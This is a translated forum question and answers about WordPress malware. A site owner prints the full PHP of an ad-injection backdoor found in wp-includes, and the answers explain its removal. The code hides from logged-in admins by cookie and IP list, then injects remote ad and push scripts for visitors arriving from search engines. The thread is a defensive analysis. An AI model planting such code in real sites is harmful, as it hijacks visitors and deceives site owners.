我在我的WordPress上的wp-includes /文件中发现了这种病毒,该文件已被siteguarding.com等扫描,并发现错误的脚本广告
ini_set('display_errors', 0);
error_reporting(0);
$anx='a107e0b262722f0cea3f7ce097597b7c';
if ( ! function_exists( 'slider_option' ) ) {
function slider_option($content){
if(is_single())
{
$con = '
';
$con2 = '
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>
';
$content=$content.$con2;
}
return $content;
}
function slider_option_footer(){
if(!is_single())
{
$con2 = '
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>
';
echo $con2;
}
}
function setting_my_first_cookie() {
setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}
if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}
if( current_user_can('edit_others_pages'))
{
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
}
}
$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
if (strpos($ref,$source)!==false) {
setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
$sevisitor=true;
}
}
if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}
}
}
}
此文件在做什么? 而如何知道该文件已插入我的网站文件根目录中? 我正在与siteguarding.com支持人员聊天,并告诉我“您的网站已被黑客入侵” wp-includes / wp-tmp.php-100%病毒 up / includes / functions.php-100%病毒 您已列入黑名单
答案 0 :(得分:0)
这是恶意软件,绝对不是WP的一部分。删除文件,编辑文件夹权限,在文件中搜索其他恶意代码。更新WP和您的插件。
答案 1 :(得分:0)
此文件使用您的IO,有时会导致404、500和数据库连接问题。
此文件使用您的主题funtions.php注入代码(恶意软件)。
此文件注入的代码从functions.php的第一行开始,并以诸如//主题tmp之类的注释结束。
解决方案是先从 / wp-includes 中删除 wp-tmp.php 和 wp-vcd.php ,然后删除来自functions.php的代码,并将父主题和子主题的functions.php权限设置为 0555 或 0444 。这样该恶意软件就无法写入functions.php